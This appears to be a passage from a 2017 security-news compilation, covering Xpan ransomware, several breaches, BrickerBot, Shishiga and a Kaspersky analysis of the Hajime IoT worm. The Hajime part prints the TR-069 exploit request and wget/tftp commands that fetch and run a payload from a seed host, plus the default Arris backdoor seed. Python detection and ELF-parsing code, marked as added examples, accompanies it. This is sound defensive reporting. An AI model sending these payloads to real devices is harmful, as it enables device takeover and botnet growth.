Even though many Brazilian-Portuguese strings are present upon initial analysis, a couple caught our attention. Firstly, the ransomware uses a batch file which passes a command line parameter to an invoked executable file; this parameter is “eusoudejesus”, which means “I’m from Jesus”. Developers tend to leave tiny breadcrumbs of their personality behind in each of their creations, and in this sample we found many of them.
A brief religious reference found in this XPan variant.
Secondly, a reference to a Brazilian celebrity is made, albeit indirectly. “Computador da Xuxa” was a toy computer sold in Brazil during the nineties; however, it is also a popular expression used to make fun of very old computers with limited power.
This is what cybercriminals think of your encrypted computer: just a toy they can control.
“Muito bichado” amounts to finding a lot of problems in this type of system; here it means that the environment in which XPan is executing is not playing fair and execution is quite buggy.
Lastly, we have the ransom note demanding that the victim send an email to the account ‘one@proxy.tg’. Considering that the extension for all the encrypted files in this variant is ‘.one’, this seems like a pretty straightforward naming convention for the criminals’ campaigns.
The rescue note in Portuguese.
Upon closer inspection, we discovered that this sample is nearly identical to another version of Xpan which used to be distributed back in November 2016 and used the extension “.__AiraCropEncrypted!”. Every bit of executable code remains the same, which is quite surprising, because since that time there were several newer versions of this malware with an updated encryption algorithm. Both samples have the same PE timestamp dating back to the 31st of October 2016.
The only difference between the two is the configuration block which contains the following information:
list of target file extensions;
ransom notes;
commands to execute before and after encryption;
the public RSA key of the criminals.
The decrypted configuration block of Xpan that uses the extension “.one”.
The file encryption algorithm also remains the same. For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file content using AES-256 in CBC mode with a zero IV. The string S is encrypted using the criminals’ RSA public key from the configuration block and stored at the beginning of the encrypted file.
According to one of the victims that contacted us, the criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did before: the user sends a message to a mailbox with his unique ID and patiently awaits further instructions.
The victims so far are small and medium businesses in Brazil: ranging from a dentist clinic to a driving school, demonstrating once again that ransomware makes no distinctions and everyone is at risk. As long as there are victims, assisting them and providing decryption tools whenever possible is necessary, no matter the ransomware family or when it was created.
Victims: we can help
This time luck is on the victims’ side! Upon thorough investigation and reverse engineering of the sample of “.one” version of Xpan, we discovered that the criminals used a vulnerable cryptographic algorithm implementation. It allowed us to break encryption as with the previously described Xpan version.
We successfully helped a driving school and a dentist clinic to recover their files for free and as usual we encourage victims of this ransomware to not pay the ransom and to contact our technical support for assistance in decryption.
Brazilian cybercriminals are focusing their efforts on creating new and local ransomware families, attacking small companies and unprotected users. We believe this is the next step in the ransomware fight: going from global-scale attacks to a more localized scenario, where local cybercriminals create new families from scratch, in their own language, and resort to RaaS (Ransomware-as-a-Service) as a way to monetize their attacks.
MD5 reference
dd7033bc36615c0fe0be7413457dccbf – Trojan-Ransom.Win32.Xpan.e (encrypted file extension: “.one”)
54217c1ea3e1d4d3dc024fc740a47757 – Trojan-Ransom.Win32.Xpan.d (encrypted file extension: “.__AiraCropEncrypted!”)
Cybercrime – Interpol shut down nearly 9,000 C&C servers in Asia hacked with a WordPress plug-in exploit
26.4.2017 securityaffairs CyberCrime
Interpol located and shut down nearly 9,000 command and control servers located in Asia and hacked with a WordPress plug-in exploit.
An investigation conducted by Interpol resulted in the identification of nearly 9,000 command and control servers located in Asia.
The law enforcement body operated with the support of private partners, including Kaspersky Lab, Cyber Defense Institute, Booz Allen Hamilton, British Telecom, Fortinet and Palo Alto Networks, and China.
According to Interpol, the investigators also spotted a number of servers operated by local governments that had been compromised and used as command and control systems for botnets.
Law enforcement shut down 9,000 C&C servers across “hundreds” of compromised Websites in Indonesia, Malaysia, Myanmar, Philippines, Singapore, Thailand, and Vietnam.
“An INTERPOL-led operation targeting cybercrime across the ASEAN region has resulted in the identification of nearly 9,000 Command and Control (C2) servers and hundreds of compromised websites, including government portals.” reads the announcement published by Interpol.
“Information provided by the private sector combined with cyber issues flagged by the participating countries enabled specialists from INTERPOL’s Cyber Fusion Centre to produce 23 Cyber Activity Reports. The reports highlighted the various threats and types of criminal activity which had been identified and outlined the recommended action to be taken by the national authorities.”
The experts involved in the investigation have discovered servers used in ransomware-based campaigns, DDoS attacks, and spam distribution.
It is interesting to note that most of the compromised servers have been hacked using an unnamed WordPress plugin exploit.
“Analysis identified nearly 270 websites infected with a malware code which exploited a vulnerability in the website design application. Among them were several government websites which may have contained personal data of their citizens.” continues Interpol, which also confirmed having identified a number of phishing website operators.
“A number of phishing website operators were also identified, including one with links to Nigeria, with further investigations into other suspects still ongoing. One criminal based in Indonesia selling phishing kits via the Darknet had posted YouTube videos showing customers how to use the illicit software.”
“With direct access to the information, expertise and capabilities of the private sector and specialists from the Cyber Fusion Centre, participants were able to fully appreciate the scale and scope of cybercrime actors across the region and in their countries,” said IGCI Executive Director Noboru Nakatani.
“Sharing intelligence was the basis of the success of this operation, and such cooperation is vital for long-term effectiveness in managing cooperation networks for both future operations and day to day activity in combating cybercrime.”
The operation is a demonstration of the crucial support of the private sector in the fight against cybercrime.
R2Games company breached for the second time in two years, over one million accounts compromised
26.4.2017 securityaffairs CyberCrime
R2Games has been compromised for the second time in a few years; more than one million accounts from its U.S., French, German and Russian forums were compromised.
Once again, hackers have targeted a gaming firm: the online gaming company Reality Squared Games (R2Games) has been breached for the second time in just two years. The news was reported by the data breach notification service LeakBase, which reported that a hacker confirmed that the security breach happened earlier this month. The company has developed many games for both iOS and Android; it currently has 19 online games in its portfolio and claims over 52 million players.
The first incident occurred in December 2015 and went on until July 2016; more than 22 million R2Games accounts were compromised. The hackers accessed usernames, hashed passwords, IP addresses, and email addresses.
This time, the hacker claimed all forums managed by R2Games have been hacked, such as the Russian version of r2games.com.
The data belongs to forums operated by the company in various countries, including the U.S., France, Germany, and Russia. Experts noticed that all the hacked platforms run the vBulletin CMS, older versions of which are affected by well-known flaws.
Data compromised in the last breach includes user credentials, email addresses, IP addresses, and other optional attributes, such as instant messenger IDs, birthday, and Facebook related details (ID, name, access token).
Hunt identified 1,023,466 unique email addresses, 482,074 were also included in data dumps from other breaches.
The dump includes 5,191,898 unique email addresses, 3,379,071 of them related to mail.ar.r2games.com or mail.r2games.com; the remaining 789,361 addresses looked automatically generated ([number]@vk.com addresses).
“When asked about the passwords, Hunt told Salted Hash many of them are MD5 with no salt, but a large number of them have a hash corresponding to the password “admin” and a few hundred thousand others are using the plain text word “sync”.” reported Salted Hash.
“The observation I’d make here is that clearly, they don’t seem to be learning from previous failures. The prior incident should really have been a wake-up call and to see a subsequent breach not that long after is worrying. Perhaps the prior denials are evidence that they just don’t see the seriousness in security,” Hunt told Salted Hash.
The gaming company did not respond to requests for comment. R2Games players are invited to change their passwords on the R2Games forums and on any other service that shares the same login credentials.
Chipotle Investigating Payment Card Breach
26.4.2017 securityweek Incident
Fast-casual restaurant chain Chipotle Mexican Grill, which has more than 2,000 locations in the United States and other countries, informed customers on Tuesday that its payment processing systems have been breached.
Chipotle said it recently detected unauthorized activity on the network that supports payment processing for its restaurants. The company’s investigation into the incident is ongoing and only limited information has been made public for now.
An initial investigation showed that attackers may have accessed data from cards used at restaurants between March 24 and April 18, 2017, but it’s unclear how many locations are affected.
Chipotle has notified law enforcement and it’s working with cybersecurity firms and its payment processor to investigate the incident. The company believes the breach has been contained, and pointed out that it has implemented some security enhancements.
“Consistent with good practices, consumers should closely monitor their payment card statements,” the company stated. “If anyone sees an unauthorized charge, they should immediately notify the bank that issued the card. Payment card network rules generally state that cardholders are not responsible for such charges.”
Chipotle’s disclosure of the data breach coincided with the company’s financial report for the first quarter of 2017. The restaurant said its revenue increased by 28.1% to $1.07 billion compared to the first quarter of 2016.
Several other major restaurant chains reported suffering data breaches in the past months, including Shoney’s, CiCi’s, Arby’s, Wendy’s and Noodles & Company.
Flaws in Hyundai App Allowed Hackers to Steal Cars
26.4.2017 securityweek Vulnerability
South Korean carmaker Hyundai has released updates for its Blue Link mobile applications to address vulnerabilities that could have been exploited by hackers to locate, unlock and start vehicles.
The Blue Link application, available for both iOS and Android devices, allows users to remotely access and monitor their car. The list of features provided by the app includes remote engine start, cabin temperature control, stolen vehicle recovery, remote locking and unlocking, vehicle health reports, and automatic collision notifications.
Researchers at security firm Rapid7 discovered that the app had two potentially serious flaws related to a log transmission feature introduced in December.
Versions 3.9.4 and 3.9.5 of the Blue Link apps upload an encrypted log file to a pre-defined IP address over HTTP. The name of the file includes the user’s email address and the file itself contains various pieces of information, such as username, password, PIN, and historical GPS data.
While the log file is encrypted, the encryption relies on a hardcoded key that cannot be modified. A man-in-the-middle (MitM) attacker — e.g. via a compromised or rogue Wi-Fi network — can intercept HTTP traffic associated with the Blue Link application and access the log file and the data it contains.
The information in this log file can be used by the attacker to locate, unlock and start the targeted vehicle.
Rapid7 has published a blog post detailing the vulnerabilities. ICS-CERT has also released an advisory which rates the MitM issue (CVE-2017-6052) as a medium severity flaw and the hardcoded cryptographic key weakness (CVE-2017-6054) as high severity.
The flaws were discovered by Rapid7 in February and Hyundai patched them in March with the release of Blue Link 3.9.6 for both iOS and Android. The new version removes the log transmission feature and disables the TCP service located at the IP address where the log files were sent. Hyundai has made the app update mandatory for users.
Hyundai said there was no evidence that the vulnerabilities had been exploited for malicious purposes.
While the flaws could have had a serious impact, Rapid7 and Hyundai pointed out that it would have been “difficult to impossible to conduct this attack at scale,” due to the fact that the attacker needed privileged network access in order to exploit the security holes.
The fact that a mobile application provided by a car manufacturer is vulnerable to hacker attacks is not surprising. In the past months, researchers reported finding flaws in many car apps, including from Tesla.
Hackers attacked tens of thousands of computers. They exploited spies' tools
25.4.2017 Novinky/Bezpečnost Hacking
It is no secret that intelligence services have sophisticated tools for spying on all kinds of computer systems. The US National Security Agency (NSA) is no exception. It is precisely this agency's spying toolkit that computer pirates have got hold of. And they immediately started abusing it.
In the internet era, the NSA's arsenal (and, it must be noted, that of other intelligence services too) commonly contains so-called exploits, i.e. special programs that make it possible to gain access to all kinds of websites and services, but also to all kinds of documents.
And it is precisely such tools, which leaked from the NSA a week ago, that computer pirates have got hold of. According to The Hacker News, several hacker groups are already abusing them in attacks.
In practice, attacks by cybercriminals using the exploits in question could look like this. Using one piece of malicious code, the attackers would get into the administration interface of some sports facility that offers a training schedule for download as a Word document. Using another exploit, they would infect that document so that they could monitor essentially every user who downloaded the file from that website.
The user would of course have no idea that the computer was infected. The document would open normally, but along with it an uninvited guest would also be downloaded to the hard drive, and through it the attacker would then gain access to all the data.
Over 100,000 attacked computers
In a similar way, hackers managed to penetrate several thousand computer systems in just one week, as security researchers from the Swiss security company Binary Edge pointed out.
They have already discovered over 100,000 computers that were attacked by various hacker groups using the NSA tools. Whether the attacks also took place in the Czech Republic is not yet clear.
As a rule these are machines running the Windows operating system. However, they are older Microsoft systems; Windows 10 is reportedly not affected by the threat, The Hacker News noted.
They take control
The attacks reportedly affected Windows XP, Windows Server 2003, Windows 7 and Windows 8. It must be stressed, however, that owners of Windows 7 and 8 should be protected against the attacks if they have installed all the latest updates. For Windows XP, however, security updates are no longer released, so its users cannot be protected.
Computer pirates can take complete control of an attacked machine. They can likewise access data stored on the hard drive, or enslave the whole machine and use it for further attacks.
Display Software Flaw Affects Millions of Devices
25.4.2017 securityweek Vulnerability
A potentially serious vulnerability has been found in third-party software shipped by several major vendors for their displays. The developer has rushed to release a patch for the flaw, which is believed to affect millions of devices worldwide.
The security hole was identified by researchers at SEC Consult in display software developed by Portrait Displays. The impacted product allows users to configure their displays (e.g. rotation, alignment, colors and brightness) via a software application instead of hardware buttons.
Portrait Displays’ products are used by several major vendors, including Sony, HP, Acer, Fujitsu, Philips, Dell, Benq, Lenovo, Sharp and Toshiba. However, SEC Consult could only confirm the vulnerability for Fujitsu’s DisplayView, HP’s Display Assistant and My Display, and Philips’ SmartControl applications. The apps, which are pre-installed on millions of devices, have been classified by the security firm as bloatware.
According to researchers, the vulnerability, tracked as CVE-2017-3210, exists in the Portrait Displays SDK service and it allows any authenticated attacker to execute arbitrary commands and escalate their privileges to SYSTEM.
SEC Consult said a hacker can exploit the flaw -- by changing the service’s binary path -- for various tasks, including to create new users, add users to groups, or change privileges.
Portrait Displays, which has classified the vulnerability as critical, has released a patch and advised users to install it immediately. The company says it’s not aware of any attacks where this flaw may have been exploited, but a “comprehensive review” is being conducted to confirm this.
As an alternative, users can address the problem by removing the vulnerable service’s permissions via the “sc” command in Windows. CERT/CC has also released an advisory for this security hole.
While a patch has been made available, SEC Consult told SecurityWeek that it’s unlikely regular users will install it any time soon, especially since many will not even know they are affected. On the other hand, experts believe affected vendors could push the patch to users via their automatic software installers (e.g. Fujitsu DeskUpdate).
“It is quite juicy to observe that companies selling millions of notebooks, PCs and convertibles simply do not care (enough) about security,” SEC Consult’s Werner Schober said in a blog post. “The affected companies do have a net worth of multiple billions, but they do not have a few thousand euros/dollars/yen to conduct a proper security review on the software and services they are acquiring from 3rd parties. This vulnerability would have been identified immediately in a thorough security review of the application/service if an audit would have been conducted by security experts before shipping devices with this software. Even automated vulnerability scans would detect such weak service permissions.”
New BrickerBot Variants Emerge
25.4.2017 securityweek BotNet
New variants of a recently discovered BrickerBot Internet of Things (IoT) malware capable of permanently disabling devices were observed last week, Radware security researchers warn.
BrickerBot first emerged about a month ago, with two variants observed in early April. The first threat had a short life span of less than a week and targeted BusyBox-based Linux devices. The other is still active and targets devices both with and without BusyBox. Devices with an exposed Telnet service that is secured with default credentials are potential victims.
The malware was designed to disable certain functionality on the targeted devices, corrupt storage, and wipe files. Because the compromised devices are rendered useless, the researchers called this type of attack Permanent Denial-of-Service (PDoS).
Given the potential damaging power of BrickerBot, the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued an alert to warn users and organizations alike of the risks they are exposed to when using IoT devices that aren’t properly secured.
Now, Radware says that two new BrickerBot variants are making the rounds, also focused on disabling IoT devices. They appear to have new command sequences, although similar to the previous variants, and have already launched thousands of attacks.
Targeting the six device types that BrickerBot.1 was hitting, but also capable of compromising several other device types, BrickerBot.3 attempts to disrupt connectivity by removing the default route and disabling TCP timestamps, while also wiping the root and limiting the number of kernel threads to 1. It focuses on the devices prone to Mirai attacks.
Radware detected 1118 PDoS attempts within the first 12 hours of activity on April 12, with all attacks launched from a limited number of clearnet IP addresses (the devices appear to be running an outdated version of the Dropbear SSH server). The number of bots performing these attacks grew to 15 within the first 12 hours.
“The devices used to perform the PDoS attacks on Radware’s honeypot do not correspond to the devices from BrickerBot.1. Although BrickerBot.1 was also abusing a limited number of clearnet connected devices to perform its attack, there is no immediate correlation between both,” Radware says. However, they were using a different honeypot when detecting the new variant.
Dubbed BrickerBot.4, the other new variant was hitting from a single device located on the Clearnet and running an outdated version of the Dropbear SSH server. This isolated bot performed 90 attacks and was active only for several hours.
“It is not possible to assess how widely spread the attacks are, but the potential damage BrickerBot.3 poses a clear and present danger for any IoT device with factory default credentials,” the security researchers warn.
According to a recent article on BleepingComputer, however, BrickerBot might have damaged over 2 million devices. Its author, who goes by the online handle Janit0r, claims to have created the malware to raise awareness of the risks insecure IoT devices pose. He sees the bot as a cure for the threat posed by IoT botnets, after they were associated with a large number of distributed denial of service attacks in the second half of last year.
Linux Shishiga malware, a threat in dangerous evolution
25.4.2017 securityaffairs Virus
Malware researchers from security firm ESET have discovered a new Linux threat dubbed Shishiga malware targeting systems in the wild.
Malware researchers from ESET have discovered a new Linux malware dubbed Linux/Shishiga targeting systems in the wild.
The Linux/Shishiga malware uses four different protocols (SSH, Telnet, HTTP and BitTorrent) and implements a modular architecture by using Lua scripts.
“Among all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web – their detection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family have generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents a new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name: Linux/Shishiga. It uses 4 different protocols (SSH – Telnet – HTTP – BitTorrent) and Lua scripts for modularity.” reads the analysis published by security firm ESET.
The spreading mechanism behind the Shishiga malware leverages brute-force attacks: the malicious code relies on weak, default credentials in its attempts to plant itself on insecure systems. The malware uses a built-in password list in its attempts to break into a system.
Although Shishiga has many similarities with other recent malware in abusing weak Telnet and SSH credentials, researchers consider it more sophisticated due to its usage of the BitTorrent protocol and Lua modules.
“At a first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH credentials, but the usage of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used in a Mirai-inspired worm, Hajime, was observed last year and we can only speculate that it might become more popular in the future.” states ESET.
According to the experts, the Shishiga malware is a work in progress: at the time of ESET’s investigation it had infected just a small number of Linux machines, and the researchers also observed continuous addition, removal, and modification of components, along with code comments and debug information.
It’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant adding, removing, and modifying of the components, code comments and even debug information, clearly indicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.
ESET is warning of a possible evolution of the Shishiga malware; in order “to prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.”
Check Point will uniformly protect networks, mobiles and the cloud
25.4.2017 SecurityWorld Zabezpečení
Check Point has introduced Infinity, a new security management architecture. It offers unified threat protection for network infrastructure, mobile devices and the cloud.
The new product combines three key features: a unified security platform, threat prevention and a consolidated system.
According to the vendor, it can supposedly block even the most sophisticated known and unknown threats before they can cause any damage, and it offers unified administration, modular policy management and integrated threat visibility.
The vendor also introduced the new ultra-high-end 44000 and 64000 security gateways with the fastest threat prevention platform to date, with real-world threat prevention throughput of 42 Gb/s and real-world firewall throughput of 636 Gb/s.
Hajime, the mysterious evolving botnet
25.4.2017 Kaspersky BotNet
Hajime (meaning ‘beginning’ in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by RapidityNetworks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown.
Hajime is continuously evolving, adding and removing features over time. The malware authors are mainly reliant on very low levels of security.
In this blogpost we outline some of the recent ‘improvements’ to Hajime, some techniques that haven’t been made public, and some statistics about infected IoT devices.
ATK module improvements
First of all, let’s take a look at the changes made to the attack module recently. Currently, the ATK (attack) module supports three different attack methods which help to propagate the worm on different IoT devices:
TR-069 exploitation;
Telnet default password attack;
Arris cable modem password of the day attack.
Of these three attacks, the TR-069 exploit is a new one, implemented recently by the attackers.
Technical Report 069 is a standard published by the Broadband Forum, which is an industry organization defining standards used to manage broadband networks. Many ISPs and device manufacturers are members of the Broadband Forum. TR-069 allows ISPs to manage modems remotely. TCP port 7547 has been assigned to this protocol, but some devices appear to use port 5555 instead.
The TR-069 NewNTPServer feature can be used to execute arbitrary commands on vulnerable devices. In order to do so, the exploit starts by connecting to port 7547 and then sends the following HTTP request:
GET / HTTP/1.1
Host: VICTIM_HOST:VICTIM_PORT
User-Agent: RANDOM_USER_AGENT
Content-Type: text/xml
Content-Length: 0
Where RANDOM_USER_AGENT is chosen from the following list:
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
After some checks, it sends the following request to trigger the vulnerability:
POST /UD/act?1 HTTP/1.1
Host: VICTIM_HOST:VICTIM_PORT
User-Agent: RANDOM_USER_AGENT
Content-Type: text/xml
Content-Length: BODY_LENGTH
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>INJECT_COMMANDS</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
The INJECT_COMMANDS can either be:
cd /tmp;tftp -l<INT_ARCH_ID> -r<INT_ARCH_ID> -g <SEED_IP_PORT>;chmod 777 <INT_ARCH_ID>;./<INT_ARCH_ID>
or:
cd /tmp;wget http://<SEED_IP_PORT>/<INT_ARCH_ID>;chmod 777 <INT_ARCH_ID>;./<INT_ARCH_ID>
Once the vulnerable device executes the commands specified in INJECT_COMMANDS, the device is infected and becomes part of the botnet.
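To recognise this exploitation attempt in traffic to a CWMP port, the following detection logic (an added example, not Kaspersky's or the worm's code) parses a raw HTTP request, checks for the SetNTPServers SOAP action and flags any NewNTPServer value containing shell metacharacters; it also notes the empty text/xml GET probe that precedes the exploit. The sample requests, the documentation-range host 192.0.2.10 and the placeholder injection string are constructed here.

```python
import re
import xml.etree.ElementTree as ET

# Characters that never occur in a legitimate NTP server hostname or IP address
# but are needed to chain shell commands (the injected commands above use ';').
SHELL_META = re.compile(r"[;|&`$()<>]|\s")
# Fallback extractor for envelopes that are too broken for the XML parser.
NTP_TAG = re.compile(r"<NewNTPServer\d>(.*?)</NewNTPServer\d>", re.DOTALL)


def parse_http_request(raw: bytes):
    """Split a raw request into (method, path, lowercase header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def ntp_server_values(body: bytes):
    """Collect NewNTPServerN values; a malformed envelope is still inspected."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return NTP_TAG.findall(body.decode("latin-1"))
    values = []
    for elem in root.iter():
        local = elem.tag.rsplit("}", 1)[-1]  # strip any namespace prefix
        if local.startswith("NewNTPServer") and elem.text:
            values.append(elem.text)
    return values


def classify_tr069_request(raw: bytes) -> dict:
    """Return a verdict for one request seen on a CWMP port (7547 or 5555)."""
    method, path, headers, body = parse_http_request(raw)
    verdict = {"method": method, "path": path, "suspicious": False, "reasons": []}
    if (method == "GET" and headers.get("content-length") == "0"
            and headers.get("content-type", "").startswith("text/xml")):
        verdict["reasons"].append("empty text/xml GET probe (pre-exploit check)")
    if not headers.get("soapaction", "").endswith("#SetNTPServers"):
        return verdict
    verdict["reasons"].append("SetNTPServers action")
    for value in ntp_server_values(body):
        if SHELL_META.search(value):
            verdict["suspicious"] = True
            verdict["reasons"].append(f"shell metacharacters in NTP server: {value[:48]!r}")
    return verdict


def build_request(ntp1: str, host: str = "192.0.2.10:7547") -> bytes:
    """Constructed sample request in the shape documented above."""
    body = (
        '<?xml version="1.0"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
        ' SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        "<SOAP-ENV:Body>"
        '<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
        f"<NewNTPServer1>{ntp1}</NewNTPServer1>"
        "<NewNTPServer2></NewNTPServer2>"
        "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    ).encode()
    head = (
        "POST /UD/act?1 HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Content-Type: text/xml\r\n"
        f"Content-Length: {len(body)}\r\n"
        "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n\r\n"
    ).encode()
    return head + body


BENIGN_REQUEST = build_request("pool.ntp.org")
# Injection string in the shape shown above, placeholders kept as placeholders.
MALICIOUS_REQUEST = build_request(
    "cd /tmp;wget http://SEED_IP_PORT/ARCH_ID;chmod 777 ARCH_ID;./ARCH_ID")
PROBE_REQUEST = (b"GET / HTTP/1.1\r\nHost: 192.0.2.10:7547\r\n"
                 b"User-Agent: Mozilla/5.0\r\nContent-Type: text/xml\r\n"
                 b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("malicious", MALICIOUS_REQUEST),
                      ("probe", PROBE_REQUEST)):
        print(name, classify_tr069_request(req))
```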
Architecture detection
With the addition of the new attack vector described above, it would make sense to improve the architecture detection logic. This is because Hajime doesn’t attack any specific type of device, but rather any device on the Internet with the exception of several networks (it does have some logic to speed up attacks on specific devices though – see the next section). And this is exactly what they did, though strangely enough this only holds for the Telnet attack.
Once the attack successfully passes the authentication stage, the first 52 bytes of the victim’s echo binary are read. The first 20 bytes, which are the start of the ELF header, hold information about the architecture, operating system and other fields. The victim’s echo ELF header is then compared against a predefined array containing the Hajime stub downloader binaries for different architectures. This way the correct Hajime downloader binary that works on the victim’s machine can be uploaded from the attacker (which is actually the infected device that started the attack).
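The header comparison described above, as an added example (not Kaspersky's or the worm's code): the first 20 bytes of an ELF file, the 16-byte e_ident followed by e_type and e_machine, already give class, endianness, OS ABI and CPU type, which is all that is needed to pick a matching binary. The same parse lets a defender inventory which architecture families are exposed on a network. The sample headers are constructed, not taken from real binaries.

```python
import struct

ELF_MAGIC = b"\x7fELF"
CLASSES = {1: "ELF32", 2: "ELF64"}
ENDIAN = {1: "little", 2: "big"}
OSABI = {0: "SysV", 3: "GNU/Linux"}
# e_machine values from the ELF specification for CPUs common on embedded Linux.
MACHINES = {0x02: "SPARC", 0x03: "x86", 0x08: "MIPS", 0x14: "PowerPC",
            0x28: "ARM", 0x2A: "SuperH", 0x3E: "x86-64", 0xB7: "AArch64"}


def identify_elf(header: bytes) -> dict:
    """Parse the first 20 bytes of an ELF file: e_ident, e_type, e_machine."""
    if len(header) < 20 or header[:4] != ELF_MAGIC:
        raise ValueError("not an ELF header")
    ei_class, ei_data, ei_osabi = header[4], header[5], header[7]
    if ei_class not in CLASSES or ei_data not in ENDIAN:
        raise ValueError("unknown ELF class or data encoding")
    # e_type and e_machine are stored in the file's own byte order (EI_DATA).
    fmt = "<HH" if ei_data == 1 else ">HH"
    e_type, e_machine = struct.unpack(fmt, header[16:20])
    return {
        "class": CLASSES[ei_class],
        "endian": ENDIAN[ei_data],
        "osabi": OSABI.get(ei_osabi, f"0x{ei_osabi:02x}"),
        "type": e_type,
        "machine": MACHINES.get(e_machine, f"0x{e_machine:04x}"),
    }


def stub_key(header: bytes) -> str:
    """Machine/class/endianness triple: the lookup key a per-architecture
    stub table needs (the same distinction the worm's comparison makes)."""
    info = identify_elf(header)
    return f"{info['machine']}-{info['class']}-{info['endian']}"


def make_header(ei_class: int, ei_data: int, e_machine: int, e_type: int = 2) -> bytes:
    """Constructed sample header: magic, class, data, version=1, ABI=0, padding,
    then e_type (2 = executable) and e_machine in the declared byte order."""
    ident = ELF_MAGIC + bytes([ei_class, ei_data, 1, 0]) + bytes(8)
    fmt = "<HH" if ei_data == 1 else ">HH"
    return ident + struct.pack(fmt, e_type, e_machine)


# Constructed samples covering the big/little-endian MIPS split that a
# single-architecture check would miss.
SAMPLES = {
    "mips-be": make_header(1, 2, 0x08),
    "mipsel": make_header(1, 1, 0x08),
    "arm": make_header(1, 1, 0x28),
    "x86-64": make_header(2, 1, 0x3E),
}

if __name__ == "__main__":
    for name, hdr in SAMPLES.items():
        print(name, stub_key(hdr), identify_elf(hdr))
```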
But before this, the host and port that the malware will be downloaded from needs to be set. The Hajime stub downloader binary has these values filled up with 0xCC bytes by default. To solve this, they are fixed on the fly right before connecting.
Furthermore the downloader needs to be patched with the WAN interface’s name. The attackers have a clever trick, where they ‘echo’ the binary to a file (“.s”), set the WAN interface name and then echo the last part of the binary (see below).
echo -ne "DOWNLOADER_HEX_BYTES" >> .s
(route -n | grep UG | grep lbr0 && echo -n lbr0 >> .s) || (route -n | grep UG | grep mta0 && echo -n mta0 >> .s)
echo -ne "DOWNLOADER_HEX_BYTES" >> .s
./.s>.i; chmod +x .i; ./.i; rm .s;
exit
“Smart” password bruteforcing
Even though Hajime can attack any device, the authors nevertheless focused on some specific brands/devices. For example, if after opening a telnet session the welcome message contains one of the following words, then the bruteforcing starts with a specific username-password combination.
Password hint words:
(none)
host
Welcome to ATP Cli
STAR-NET ADSL2+ Router
Mdm9625
BCM
MikroTik
SMC
P-2612HNU
ipc
dvrdvs
F660
F609
One string that is not listed above is “ARRIS”, because if this string is found, the attack changes slightly. The ATK module uses a specially crafted password of the day for the Arris cable modem instead of the static telnet passwords. The ARRIS password of the day is a remote backdoor known since 2009. It uses a DES-encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily password. The default seed is “MPSJKMDHAI” and many ISPs don’t bother changing it at all. After successful authentication the module gains access to a remote shell and can execute commands.
Victimology
While working on this blogpost, we collected statistics using three different methods:
We had a honeypot with telnet open;
We looked at the infected peers as DHT seeders;
We looked at the infected peers as DHT leechers;
Of these three methods, the DHT leecher count proved to be the best. By announcing on the DHT network with a peer id similar to that day’s identifier of the configuration file we were able to be the “nearest” node and collected requests from almost every infected device.
The DHT seeder count is an inverse method; we were requesting the Hajime config and receiving the lists of seeding nodes. Due to the limitations of the DHT architecture we can see most of the leechers, but not most of the seeders. Therefore, the seeder data is of less relevance than the leecher data.
Geography of telnet attackers
